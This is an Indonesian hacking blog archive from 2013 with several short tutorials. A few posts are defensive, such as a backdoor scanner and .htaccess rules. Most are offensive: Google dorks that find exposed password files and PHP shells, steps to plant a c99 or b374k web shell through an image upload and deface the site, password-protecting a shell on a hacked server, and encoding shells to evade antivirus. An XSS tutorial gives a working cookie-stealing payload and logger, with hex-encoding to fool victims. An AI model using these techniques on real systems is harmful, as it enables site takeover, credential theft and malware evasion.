Scan shell backdoor pada website

Posted by Fatkhur On Kamis, 31 Januari 2013 0 komentar

Sekedar untuk share kembali,scan backdoor yang mungkin akan berguna bagi Admin web untuk scanning kemungkinan adanya malscript atau web shell yang disisipkan oleh heker ke dalam situs.

Penggunaannya cukup mudah. upload ke hosting anda dan ceklis beberapa opsi yang diperlukan. misalnya ceklis kolom "other keyword" dan isi dengan nama keyword c99.php , execute, upload atau keyword lain yg dicurigai sebagai malscript. lalu klik "start scan". maka Backdoor scanner ini akan memeriksa file di host yang memuat keyword tersebut. Jika ditemukan, maka akan ditampilkan.

Perlu ditambahkan juga bahwa tidak semua file yang ditampilkan merupakan backdoor, anda juga perlu langsung memeriksanya kembali isi script yang telah terdeteksi.
 Penggunaanya pun sangat simple
1.download dulu scannernya Backdoorscanner lalu upload di file manager hosting kalian
2.panggil directory dimana anda mengupload tadi semisial :/: http/situs anda/files/includes/backdoorscan.php
3.pilih mode scan backdoor lalu klik start scanner


4.Lalu tunggu hingga scan selesai
alhasil ditemukan letak shell backdoor yang selama ini meresahkan admin





semoga berguna.

Mencegah serangan LFI vuln di web kita

Posted by Fatkhur On Selasa, 29 Januari 2013 0 komentar

di sini saya akan memberikan sedikit clue or beberapa tips untuk mencegah Local File Inclusion Vulnerability in our website

langsung saja ini beberapa tips to handle local fie inclusion :via .htaccess file INGAT YAA . .

====================================
Put following in .htaccess and
put it in the appropriate directory
====================================
# Sample '.htaccess' file for 'pub' subdirectory

# Allow all access
Allow from all

# Deny people from looking at the index and running SSI and CGI
Options None

# If you have PHP4 or PHP5 installed make sure the directive
# below is enabled. If you do not have PHP installed you will
# need to comment out the directory below to avoid errors:
php_flag engine off

# If you have PHP3 installed make sure the directive below is
# enabled:
#php3_engine off

# This line will redefine the mime type for the most common
# types of scripts. It will also deliver HTML files as if they
# are text files:
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi


===========================
-=[2]=- Via Directory directive
===========================

<DirectoryMatch "/images|/upload|/Upload|/Images">
# Ignore .htaccess files
AllowOverride None

# Serve scripts as plaintext
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi

# Don't run arbitrary PHP code.
php_admin_flag engine off
</DirectoryMatch>


==========================
-=[3]=- Via Location directive
==========================

<LocationMatch "/images|/upload">
# Ignore .htaccess files
AllowOverride None

# Serve scripts as plaintext
AddType text/plain .html .htm .shtml .php .php3 .php5 .phtml .phtm .pl .py .cgi

# Don't run arbitrary PHP code.
php_admin_flag engine off
</Location>

===========================

Jika ada yg kurang Mohon di tambahkan , maklum no body`s perfect :)

 ketawa
If any something wrong feel free to correction or give critic . :) 

Memanfaatkan google sebagai mesin pencari untuk hacking

Posted by Fatkhur On Senin, 28 Januari 2013 0 komentar

mungkin pada tau yg beginian atou mungkin blm ada yg tau...
so to the point aj ya...!
berikut tutornya

Banyak sekali website yang berguguran dengan memanfaatkan pencarian pada Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari ribuan website tampilan utamanya berubah. Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik dengan menggunakan Google.

01. Penggunaan Dasar
- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX, Akan menghasilkan hal yang sama

- AND: Secara Default Google menggunakan keyword and. Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"

- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah satu dari keyword. Note: OR dituliskan dengan huruf besar semua. Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"

- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan

- -: Tanda minus "-" bisa digunakan utk mengecualikan kata tertentu dalam pencarian. Misal kita ingin mencari kata "linus tanpa linux", kita bisa menggunakan "linus -linux"

- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja* Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll. Google akan menghasilkan pencarian hanya yang mengandung kata "menja". Tetapi google mendukung penggunaan * dalam pencarian kalimat. Keyword: "menjadi * hacker". Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker", "menjadi white hacker", dll.

- "": Dapat digunakan untuk mencari kata yg lengkap. Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"

- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3

02. Operator Spesial
- intitle: Untuk mencari kata-kata dari judul suatu halaman web. Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan deskripsi "Administrasi"


- allintitle: Untuk mencari kata-kata dari judul halaman web secara lengkap. Keyword: allintitle:Admin Administrasi Keyword tersebut akan mencari judul halaman yang mengandung kata "Admin" dan "Administrasi"

- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata tertentu. Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"

- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata tertentu. Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin" dan "Administrasi"

- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"

- cache: Ketika Googlebot mengindeks suatu situs, google akan mengambil snapshot dari semua halaman yang telah terindeks. Operator ini membantu melihat halaman-halaman yang telah dicache. Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya pada snapshot/cache yang disimpan oleh Google.

- define: Operator ini digunakan untuk mencari definisi dari frasa tertentu. Semua kata yang diketik setelah operator ini akan diperlakukan sebagai satu frasa.
Keyword: define:hacker



- filetype: Jika kita mencari jenis file tertentu yang berisi informasi yang anda inginkan kita bisa
menggunakan operator ini. Keyword: "hacker" filetype:pdf. Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html
 
 - link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa menggunakan operator link. Keyword: link:www.google.com

- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu. Keyword: related:www.google.com

03. Tips & Tricks

Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan operator tersebut. Contoh:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian anda bisa mencoba keyword:
site:echo.or.id hacker, akan menghasilkan semua site echo.or.id yang mengandung kata hacker.
Kita juga dapat melakukan pencarian secara spesifik melalui google. Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education

Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

intitle:index of intitle:mp3 -html -htm name size intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size intitle:index of intitle:cgi-bin password -html -htm name size

inurl:"admin.mdb" -html inurl:"password.mdb" -html
inurl:"data.mdb" -html
"phpMyAdmin" "running on" inurl:"main.php"
intitle:"PHP Shell" "Enable stderr" php

 


Mungkin banyak dari kita yang sudah tau apa itu webshell ? WebShell (PHP Shell), itu sebuah aplikasi berbasis php, yg dipake user untuk berinteraksi dengan server sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug.


Tamper Data adalah salah satu add-ons pada Mozilla yang berguna dalam web-hacking. Cara kerja Tamper Data adalah dengan memanipulasi sistem pengiriman data pada web (method POST). Method POST ini adalah sebuah fungsi Javascript yang aktif ketika kita meng-klik tombol submit atau sejenisnya. Pada saat tombol tersebut di klik maka sistem akan mengirimkan sebuah value/nilai yang akan menentukan hasil dari klik yang kita lakukan.
Oleh karena itu Method POST ini terkadang menjadi salah satu kelemah sebuah sistem website, karena kita bisa mengubah data yang akan dikirim. Tamper Data memungkinkan kita mengubah value/nilai dari method POST tersebut.





Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau fasilitasnya hanya untuk upload file.jpg gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit
1. Siapakan dulu file shell.php seperti : C99Shell, r57, atau b374k bisa di download di Shell backdoor
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita :D
4. Restart dan kita mulai upload
5. cari login admin sebuah website disini saya anggap kalian sudah punya login sebagai admin Lnacjut
6. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan
7. Trus Uploads shell.php.jpg kita dan tamper :D
8. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah :D
Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget,dan berhasil deh webshellnya sudah tertanam sekarang tinggal terserah kalian mau dideface atau cuman liat-liat


 gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung

Cara memberi password pada shell backdoor

Posted by Fatkhur On Sabtu, 26 Januari 2013 0 komentar




misalnya saya akan memberi password pada shell backdoor c99.php
yang mempunyai script



lalu Masukan script berikut tepat di bawah <?php

// --- pop-up

$user = "isi-username";

$pass = "isi-password";

 if (($_SERVER["PHP_AUTH_USER"] != $user) || (($_SERVER["PHP_AUTH_PW"]) != $pass))

 {

  header("WWW-Authenticate: Basic realm=\"dvildance was here\"");

  header("HTTP/1.0 401 Unauthorized");

  exit();

 }

// --- php shell 
jadinya




lalu upload di server hasil hack dan panggil shell anda
 maka muncul popup password



SUKSES . . .


Note :

Tidak semu host mendukung adanya script pop-up di atas, jadi harap di coba sebelum memberi password pada php shell.Tapi kebanyakan mendukung pop-up

 

Tutorial dasar xss

Posted by Fatkhur On Rabu, 23 Januari 2013 0 komentar

Cross Site Scripting atau biasa dikenal dengan XSS merupakan salah satu vulnerability pada website
yang kerap kali dapat ditemukan pada aplikasi website dan dapat digunakan oleh pihak-pihak yang
tidak bertanggungjawab untuk mengeksekusi code HTML atau javascript pada komputer korban.
Umumnya komputer yang menjadi korban adalah mereka yang mengakses website yang vulnerable.

Tujuan 
Tujuan dari peretas mengeksploitasi celah keamanan menggunakan teknik XSS adalah untuk mecuri
cookie
yang ada di komputer client (cookie stealing), Melakukan redirection URL dengan maksud
“tertentu” (URL Redirection) melalui teknik kejahatan yang dinamakan phising dan lainnya. Tujuan
lain dari tulisan ini dibuat adalah untuk menambah pemahaman kita tentang serangan dengan
menggunakan XSS dan perbedaan antara teknik yang satu dan lainnya dalam mengeksploitasi
vulnerability XSS.

Jenis-jenis Cross Site Scripting (XSS)
Secara umum, teknik XSS ini dibagi dalam tiga kelompok yaitu DOM Based XSS, Non-persistent XSS
dan Persistent XSS. Penjelasan mengenai ketiga jenis teknik XSS tersebut adalah sebagai berikut

DOM BASED XSS
Dom based XSS terjadi karena adanya kesalahan yang dilakukan oleh programmer ketika
memprogram sebuah file yang disimpan pada local machine yang menjadi target eksploitasi.
Beberapa software third party yang dapat diinstall pada sebuah komputer umumnya melampirkan
sebuah file berbasis HTML yang berisikan README/HELP.
Celah keamanan ini akan diketemukan ketika sebuah software pada local machine tersebut dapat
dieksploitasi oleh peretas. Melakukan eksploitasi pada DOM based XSS umumnya hampir sama
dengan eksploitasi dengan non-persistent XSS.

NON-PERSISTENT XSS
Non-persistent XSS kerap kali ditemui oleh kita pada aplikasi-aplikasi yang berbasis web. Hal ini
terjadi karena ada kesalahan dalam programming yang dilakukan oleh programmer dalam melakukan
filtrasi atas inputan-inputan yang dilakukan oleh user.
Sesuai dengan namanya, akibat yang ditimbulkan oleh serangan jenis ini hanya bersifat sementara
yaitu ketika user mengklik URI yang diberikan. Celah keamanan ini akan umumnya dapat dijumpai
pada website-website yang menyediakan fitur search terhadap sebuah konten.

PERSISTENT XSS
Persistent-XSS terjadi karena kecerobohan dari programmer saat menuliskan kode program yang
tidak melakukan filtrasi terhadap inputan yang diberikan oleh user dan dapat disimpan secara
permanen dalam sebuah website.
Umumnya hal ini terjadi pada aplikasi-aplikasi yang mengizinkan user menyimpan data secara bebas
dalam sebuah website. Aplikasi-aplikasi tersebut diantaranya adalah buku tamu (guestbook), forum
dan aplikasi sejenis lainnya.

Akibat yang ditimbulkan
Umumnya celah keamanan ini akan lebih banyak menimpa client ketimbang server. Misalnya
seperti Cookie Stealing, Session Hijacking, Phising dan lain sebagainya.

Proof of Concept (PoC)
Dibawah ini dapat anda temukan tulisan yang menunjukkan Proof of Concept atau pembuktian dari
sederetan teori yang telah dijelaskan diatas, Pastikan Apache, MySQL dan PHP (AMP) telah terinstall
didalam PC anda sebelum mencoba PoC dibawah ini.

Non-Persistent and DOM XSS Attack
Seperti yang telah dipaparkan sebelumnya serangan DOM XSS dan Non-persistent XSS hampir
sama pola eksploitasinya. Untuk membantu dalam memahami pola serangan tersebut, dibawah ini
sudah di siapkan sebuah contoh code html/php sederhananya.
 buat

File: index.html

<html>
<head>
<title>Search Engine with XSS Vulnerability</title>
</head>
<body>
<form method=”GET” action=”cari.php”>
<input type=”text” size=”25” name=“key”>
<input type=”submit” value=”Cari..”>
</form>
</body>
</html>
File: cari.php

<?php
/* PHP Non-Persistent and DOM XSS Attack Code
** Programmer: Marion Renaldo Rotinsulu
** Date: 3rd May 2011
** Filename: cari.php
** Version: 1.0
** Description: File ini merupakan contoh sederhana dari aplikasi searching
dalam sebuah web.
*/
session_start();
$_SESSION[‘desc’] = “ujicoba dom dan non-persistent xss”;
if(isset($_GET[“key”])){
echo “<pre> Anda sedang mencari dengan kata kunci
”.$_GET[“key”].”…</pre>”;
}
?>
Penjelasan:
Anda bayangkan sekarang anda sedang menggunakan search engine layaknya google. Dihalaman
utama google hanya ada sebuah halaman dengan 1 form untuk search dan 1 lagi button submitnya.
Didalam scenario kali ini kita namakan file tersebut adalah index.html. Untuk dapat memproses apa
yang anda inginkan tentunya butuh file yang bertindak sebagai processor. File tersebut dalam
scenario kali ini kita namakan cari.php.
Pada metode passing parameter dari box search di halaman index.html kita memilih untuk
menggunakan metode GET pada http, sehingga parameter yang akan kita kirimkan pada file cari.php
akan terlihat pada kolom url.



Sebagai contoh kita akan mencari “Security” maka
setelah anda tekan tombol Cari di halaman index.html,
anda akan diantarkan pada halaman cari.php dan di
browser akan ada tulisan sebagai berikut: Anda
Sedang mencari dengan kata kunci Security…
Selanjutnya mari kita perhatikan kolom url pada
browser, maka aka nada tulisan sebagai berikut:
http://localhost/cari.php?key=Security.
 
Jika kita lihat pada source code cari.php, programmer tidak melakukan filtering terhadap inputan yang
diberikan oleh pengguna. Sehingga, apapun yang kalian cantumkan akan dieksekusi oleh php script.
Sekarang, coba kalian ganti kata Security pada url dengan <script>alert(“ih Wow!)</script>. Yang
akan terjadi adalah box alert akan muncul pada browser dengan tulisan “ih Wow!”.
Ketika halaman cari.php dapat melakukan eksekusi terhadap inputan javascript diatas, artinya
halaman website tersebut vulnerable terhadap serangan yang dinamakan XSS. Namun, bagaimana
untuk menggunakan vulnerable XSS ini untuk melakukan kejahatan? Jawaban: dengan
memanfaatkan kode javascript. Berikut beberapa contoh pemanfaat XSS yang populer (Cookie
Stealing, URL Redirection/Phising).

Cookie Stealing
Cookie stealing digunakan untuk mencuri cookie yang ada pada komputer client, yang dapat
dimanfaatkan untuk kejahatan session hijacking dan akhirnya berujung pada login bypass. Untuk
melakukan cookie stealing bisa dilakukan dengan cara sebagai berikut:

Skenario:
Di website http://localhost/xss/ sudah diketemukan bahwa website tersebut memiliki vulnerability xss.
Website ini banyak diakses oleh user diberbagai dunia sehingga, seorang attacker akan melakukan
aksinya guna mencuri cookie yang ada pada computer user.
Langkah awal sang attacker membuat dua file yaitu payload.js dan cookie.php. payload.js adalah file
yang akan di embed kedalam URI website http://localhost/xss/ sedangkan file cookie.php akan
disimpan di dalam server yang dimiliki oleh sang attacker. Dibawah ini dapat ditemukan script yang
dibuat oleh sang attacker untuk mencuri cookie pada computer user.

payload.js
// JavaScript Document
document.location="http://localhost/cookie/cookie.php?c="+document.cookie
cookie.php
<?php
/*Cookie Stealer*/
$f=fopen('cookie.txt','a');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
fwrite($f, "IP Address : ".$_SERVER['REMOTE_ADDR']."\n".
"Cookie : ".$_GET['c']."\n".
"Date/Time : ".$date."\n".
"Referer : ".$referer."\n".
"User Agent : ".$_SERVER['HTTP_USER_AGENT']."\n\n\n");
fclose($f);
?>
Penjelasan baris per baris dari code yang saya tuliskan diatas tidak akan saya jelaskan didalam
tulisan ini, karena untuk menjelaskannya sendiri membutuhkan waktu yang lumayan lama. Untuk
dapat melakukan pencurian cookie, kita akan melakukan embedding file javascript kedalam URI
sehingga menjadi seperti berikut :
http://localhost/xss/cari.php?key=<script src="http://localhost/cookie/payload.js"></script>

Namun jika URI seperti diatas akan diberikan kepada user, tentunya user akan menaruh kecurigaan.
Sehingga perlu dilakukan encode kedalam bentuk heksadesimal. Untuk melakukan encode ke dalam
hexadecimal, saya menggunakan tools yang telah ada di http://ha.ckers.org/xss.html. URI diatas akan
menjadi seperti berikut ini:

http://localhost/xss/cari.php?key=%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74
%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%63%6F%6F%6B%69%65%2F
%70%61%79%6C%6F%61%64%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E

Sebelum anda melakukan serangan pastikan dua hal dibawah ini:
1. Folder tempat anda menyimpan file cookie nanti dapat ditulis oleh user apache. Pada contoh kali
ini saya meletakkan file cookie didalam folder yang sama dengan script phpnya.
2. Jika webserver anda linux, pastikan user apache diberikan privileges/izin untuk menulis difolder
tersebut. Amannnya di change modenya menjadi Read Write Execute oleh semua user, namun
jangan diletakkan difolder yang dapat diakses melalui website.
Setelah url berhasil di encode dan dilakukan eksekusi oleh user pada browsernya, maka cookie yang
ada di client akan disimpan pada file cookie.txt pada server attacker. Adapun dokumen cookie yang
tersimpan pada server isinya ditunjukkan pada gambar dibawah ini:

URL Redirection
Teknik yang digunakan dalam url redirection hampir sama dengan teknik cookie stealing. Tujuan dari
attacker menggunakan url redirection adalah menginginkan user membuka halaman palsu untuk login
biasa dikenal dengan istilah phising atau menginginkan user mendownload sesuatu ke dalam
komputernya seperti virus, worm, dan sebagainya.

Apa yang harus dimodifikasi dari yang telah kita buat dalam payload.js? yang kita akan modifikasi
adalah file yang akan kita berikan ketika user membuka url yang kita berikan. Untuk lebih
menggambarkan modifikasi tersebut, dapat diperhatikan contoh dibawah ini:
Attacker menginginkan user membuka url dan mendownload wormtail.exe yang merupakan virus
ganas kedalam komputernya. Maka modifikasi yang dilakukan oleh sang attacker dalam file
payload.js adalah
document.location= “http://www.example.com/wormtail.exe”

Persistent XSS Attack
Serangan jenis ini bersifat permanen karena attacker dapat menyimpan codenya kedalam database
website. Sangat sering dijumpai pada website yang ada guestbook ataupun shout box yang dibuat
tanpa memfilter inputan yang diberikan.
Untuk lebih menjelaskan tentang serangan jenis ini, kita akan membuat sebuah aplikasi guestbook
sederhana. Aplikasi ini kemudian diexploit oleh attacker dengan menggunakan teknik persistent XSS
attack.
Untuk membuat aplikasi guestbook ini, kita akan membuat 3 file utama yaitu form
guestbook(guestbook.html), user interface untuk melakukan viewing guestbook(view_guestbook.php),
dan file yang berfungsi untuk menangani proses penyimpanan ke dalam database(guestbook.php).

guestbook.html
<html>
<head>
<title>Buku Tamu</title>
</head>
<body>
<form method="post" action="guestbook.php">
<table border="0" align="center" cellpadding="0" cellspacing="0"
width="300px">
<tr>
<td>Nama</td>
<td>:</td>
<td><input type="text" name="nama" size="15"></td>
</tr>
<tr>
<td valign="top">Pesan</td>
<td valign="top">:</td>
<td valign="top"><textarea name="pesan" cols="25"
rows="12"></textarea></td>
</tr>
<tr>
<td colspan="3" align="center"><input type="submit"
value="Simpan!"></td>
</tr>
</table>
</form>
</body>
</html>
view_guestbook.php 
/* PHP View Guestbook Code
** Programmer: Marion Renaldo Rotinsulu
** Date: 5th May 2011
** Filename: view_guestbook.php
** Version: 1.0
** Description: File ini merupakan contoh sederhana dari aplikasi view
guestbook dalam sebuah web.
*/
<html>
<head>
<title>ISI BUKU TAMU</title>
</head>
<body>
<table border="1" cellpadding="5" cellspacing="3" style="bordercollapse:
collapse">
<tr><td>Ke</td><td>Nama</td><td>Pesan</td>
<?php
mysql_connect("localhost","root","marionaja");
mysql_select_db("test");
$query= mysql_query("SELECT * FROM bukutamu");
while(($result = mysql_fetch_object($query))){
echo "<tr><td>".$result->id."</td><td>".$result-
>nama."</td><td>".$result->pesan."</td></tr>";
}
?>
</table>
</body>
</html>
guestbook.php
/* PHP Guestbook Code
** Programmer: Marion Renaldo Rotinsulu
** Date: 5th May 2011
** Filename: view_guestbook.php
** Version: 1.0
** Description: File ini akan menangani “penyimpanan” data kedalam website.
*/
<?php
$nama = $_POST["nama"];
$pesan = $_POST["pesan"];
mysql_connect("localhost","root","marionaja");
mysql_select_db("test");
mysql_query("INSERT INTO `bukutamu` VALUES
('','".$nama."','".$pesan."')");
?>
 Pada script diatas, anda dimungkinkan untuk melakukan submit pada aplikasi guestbook seperti
<script>alert(‘test’);</script> dan itu akan disimpan permanent di dalam database.
Akibatnya, setiap kali anda akan membuka halaman view_guestbook kotak alert akan selalu keluar

Akibat yang lebih parah dari adanya kerentanan ini adalah cookie stealing. Tekniknya sama seperti
diatas hanya saja kita akan memasukkan payload yang telah kita buat pada non-persistent xss untuk
disimpan pada buku tamu yang kita buat saat ini.

Pencegahan
Pencegahan utama dari vulnerability XSS ini adalah melakukan filter terhadap inputan yang diberikan
user. Tanpa adanya filter input pada aplikasi, vulnerability ini tetap berbahaya.
Pada aplikasi berbasis php gampangnya kita menggunakan fungsi strip_tags() untuk melakukan
filtering terhadap simbol2 inputan user yang dapat menimbulkan xss. Pada script guestbook.php
diatas inputan nama/pesan diubah menjadi berikut
$nama = strip_tags($_GET[“nama”]);
$pesan = strip_tags($_GET[“pesan”]);
Ada juga cara lain yang dapat digunakan untuk melakukan filter input. Cara ini agak rumit karena kita
harus belajar cara penulisannya. Cara yang saya maksudkan adalah Regular Expression (RegEx
<baca:regex>). Pada tulisan kali ini saya tidak akan membahas tentang regex, karena membahas
regex sama halnya dengan menuliskan artikel yang baru.

Kesimpulan

Dari apa yang ada pada tulisan ini kesimpulan yang dapat kita ambil adalah Cross Site Scripting tidak
membahayakan server, namun yang menjadi ancaman utama dari serangan ini adalah Client/User.

Membuat shell backdoor tidak terdeterksi Anti-virus

Posted by Fatkhur On Selasa, 22 Januari 2013 0 komentar

"to the point" aja :
disini saya asumsikan bahwa shell/backdoor yang kita gunakan nanti adalah berbasis PHP (script php)

contohnya: c99 (saya gunakan ini)
c99.php bisa di download c99shell collection

tentu saja script tersebut jika di-scan dengan antivirus bakalan dikenali sebagai trojan/backdoor/phpshell dan semacamnya.
tentunya umur dari shell yang akan kita pasang nantinya gak akan bertahan lama jika server menggunakan
antivirus

saya scan di virustotal.com
dan hasilnya:

 lalu bagaimana supaya gak terdeteksi??
Hehehe..

script shell yang saya dunlut tadi (c99.txt) tentunya masih telanjang yang sangat gampang untuk di deteksi oleh AV..
jadi untuk mengecoh AV saya akan mencoba untuk meng-encode script shell tersebut (mungkin bisa dibilang enkripsi kalee ya)
untuk cara cepatnya saya gunakan PHP Encoder online
salah satunya: http://www.phpshadow.com/online-encoder.php

tinggal kita masukkan disana source dari script shell yang kita gunakan kemudian klik tombol encode :blink:

copas deh tuw hasil encode nya n simpen extensi .php/.txt/.jpg ato apalah yang biasa anda gunakan...

kemudian coba scan lagi dengan AV, saya coba lagi di virustotal.com
dan hasilnya:

 bisa dibilang 99% AV terkecoh dan tidak mengenali shell/BD yang sudah di encode tadi :P

semoga bermanfaat....

Cara menggunkan VPN

Posted by Fatkhur On Jumat, 18 Januari 2013 0 komentar


VPN adalah singkatan dari Virtual Private Network, yaitu sebuah cara aman untuk mengakses local area network yang berada diluar jangkauan, dengan menggunakan internet atau jaringan umum lainnya untuk melakukan transmisi paket data secara pribadi, dan terenkripsi. Sedangkan PPTP adalah singkatan dari Point-to-Point Tunneling Protocol, dan merupakan sebuah metode dalam implementasi penggunaan VPN. Pembahasan PPTP memang sedikit lebih teknis, dan kita tidak membahasnya disini.
VPN biasanya digunakan untuk menghubungkan kantor-kantor yang tersebar dibeberapa tempat dengan menggunakan akses internet. Namun, VPN juga dapat digunakan untuk keperluan lain, seperti anonimity (menyembunyikan identitas) atau mem-bypass firewall (termasuk mem-bypass content filtering).
VPN komersial, biasanya menggunakan aplikasi khusus untuk melakukan koneksi VPN, dan menurut saya penggunaannya kurang simpel, karena aplikasi tersebut harus di instal kedalam komputer. Oleh karena itu, saya lebih memilih VPN dengan dukungan PPTP, karena kita dapat menghubungkan komputer langsung ke jaringan VPN tanpa menggunakan aplikasi tambahan.
Ada beberapa situs yang menyediakan VPN gratis dengan dukungan PPTP, antara lain :
atau pengen yang free dan kecepatanya wush wush bisa iat user n pass di

Dalam tutorial VPN dengan PPTP ini, saya menggunakan komputer berbasis Windows 7. Sehingga pengaturannya mungkin akan sedikit berbeda jika anda menggunakan sistem operasi lainnya.
dan saya mengambi data free dari  http://www.vpnbook.com/#pricing
Server #1 (Romania)
I.P: euro1.vpnbook.com
Username: pptp
Password: 9jHbfKiN 

Server #2 (Romania)
 I.P: euro2.vpnbook.com
 Username: pptp
Password: 9jHbfKiN

Langkah-langkah melakukan koneksi VPN dengan PPTP?
Terlebih dahulu kunjungi salah satu website diatas, kemudian catat VPN server, username dan password-nya. Dalam contoh berikut kita akan menggunakan VPN dvildance

Selanjutnya, bukalah Control Panel dari Start Menu, kemudian pilih  ”View network status and tasks” dibawah kategori “Network and Internet”.
 Kemudian, klik pada pilihan “Setup a new connection or network
 Pilih pada “Connect to a workplace“, kemudian pilih Next.
 Langkah selanjutnya, pilih “No, create a new connection“, kemudian Next.
 Selanjutnya, pilih “Use my internet connection (VPN)
 Pada bagian Internet address isikan dengan VPN server yang dicatat sebelumnya, dan untuk Destination name isikan terseraqh anda , dan tandai pada “Don’t connect now”.

 Kemudian, pada bagian username isikan “ pptp”, untuk password biarkan kosong (karena password akan berubah secara berkala)atau kalau password tidak pernah berubah masukkan saja  tidak apa apa 9jHbfKiN , kemudian pilih “Create”.

Terakhir pilih “Close“.
 Untuk melakukan proses koneksi VPN, pastikan terlebih dahulu koneksi internet anda sudah aktif. Klik pada status koneksi di system tray (pojok kanan bawah taskbar), pilih VPN xbuster404, kemudian klik “Connect“.

 Isikan password yang ditampilkan pada web superfreevpn ke dalam kolom password, kemudian klik “Connect” (biarkan domain kosong).

 Proses koneksi akan berlangsung, dan tunggu sampai VPN terhubung. Jika VPN telah terhubung, maka akan terlihat 2 koneksi yang connected pada status koneksi di Windows

Silakan browsing dengan sepuasnya! :)
Dalam kondisi terhubung VPN, maka koneksi anda akan terenkripsi dan dapat melewati firewall atau content filtering dengan aman.
Fitur dari VPN ini :
PPTP and OpenVPN
100% Anonymous
No Logs ( Doesn't Not Log Any Activity )
100% Free !
No Bandwidth Limits
Strong Encryption
No Restrictions
Smart CDN Fallback
Maximum Speed
Works on all Mobile Devices and Operating System

Ddos koneksi internet dengan ettercap(pengganti netcut)

Posted by Fatkhur On Minggu, 06 Januari 2013 0 komentar

tutor kali ini menggunakan backtrack os
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut
[01]. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya [03]. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses
